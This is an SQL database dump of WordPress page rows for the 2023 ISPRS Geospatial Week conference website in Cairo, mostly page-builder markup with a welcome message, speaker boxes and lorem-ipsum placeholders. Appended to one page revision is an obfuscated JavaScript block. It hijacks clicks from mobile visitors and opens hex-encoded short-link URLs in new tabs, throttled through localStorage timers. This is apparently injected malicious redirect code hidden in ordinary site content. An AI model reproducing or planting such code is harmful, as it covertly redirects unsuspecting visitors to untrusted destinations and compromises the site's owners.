anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. AASTMT has a host of qualified professors and experts who are capable of supporting Arab and African countries in various scientific fields. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world. We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, half-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</p>\n<p>[/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" bg_type=\"bg_color\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529517572787{padding-top: 70px !important;padding-bottom: 55px !important;}\" bg_color_value=\"rgba(170,170,170,0.1)\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"How can we help you?\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]Our job is nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan, quis maximus urna venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-1 vc_col-lg-10 vc_col-md-offset-0 vc_col-md-12\"][vc_row_inner content_placement=\"top\"][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-users\" icon_size=\"24\" icon_color=\"\" title=\"Agile team\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529526716112{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-sitemap\" icon_size=\"24\" icon_color=\"\" title=\"Scrum\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517895768{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-window-restore\" icon_size=\"24\" icon_color=\"\" title=\"TDD\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517964919{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-code\" icon_size=\"24\" icon_color=\"\" title=\"Clean code\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518016290{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-thumbs-up\" icon_size=\"24\" icon_color=\"\" title=\"Quality software\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518063362{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-rocket\" icon_size=\"24\" icon_color=\"\" title=\"Innovative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518383809{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-gem\" icon_size=\"24\" icon_color=\"\" title=\"Cost effective\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518233084{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-check-square\" icon_size=\"24\" icon_color=\"\" title=\"Transparent &amp; honest\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518135334{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-lightbulb\" icon_size=\"24\" icon_color=\"\" title=\"Creative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518683161{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529525768333{padding-top: 70px !important;padding-bottom: 75px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Our latest projects\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]We provides a full spectrum s nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-12 vc_col-md-offset-0 vc_col-md-12\"][dt_portfolio_carousel dis_posts_total=\"12\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" slides_on_wide_desk=\"3\" slides_on_lapt=\"2\" slides_on_h_tabs=\"2\" slides_on_v_tabs=\"1\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" next_icon=\"icon-ar-013-r\" prev_icon=\"icon-ar-013-l\" arrow_icon_size=\"32px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" arrow_icon_color=\"rgba(0,0,0,0.15)\" arrows_bg_show=\"n\" arrow_icon_color_hover=\"\" arrows_bg_hover_show=\"n\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<p>I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-04 01:59:29','2022-10-04 01:59:29','',2167,'https://gsw2023.com/?p=2274',0,'revision','',0),
(2275,1,'2022-10-04 04:08:39','2022-10-04 04:08:39','','aast32','','inherit','open','closed','','aast32','','','2022-10-04 04:08:39','2022-10-04 04:08:39','',0,'https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg',0,'attachment','image/jpeg',0),
(2276,1,'2022-10-04 04:08:53','2022-10-04 04:08:53','','aast32','','inherit','open','closed','','aast32-2','','','2022-10-04 04:08:53','2022-10-04 04:08:53','',0,'https://gsw2023.com/wp-content/uploads/2022/10/aast32-1.jpg',0,'attachment','image/jpeg',0),
(2277,1,'2022-10-04 04:13:03','2022-10-04 04:13:03','','aast33','','inherit','open','closed','','aast33','','','2022-10-04 04:13:03','2022-10-04 04:13:03','',0,'https://gsw2023.com/wp-content/uploads/2022/10/aast33.jpg',0,'attachment','image/jpeg',0),
(2278,1,'2022-10-04 04:58:27','2022-10-04 04:58:27','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"]</p>\n<h5 style=\"text-align: center;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. AASTMT has a host of qualified professors and experts who are capable of supporting Arab and African countries in various scientific fields. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world. We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, half-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</h5>\n<p>[/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" 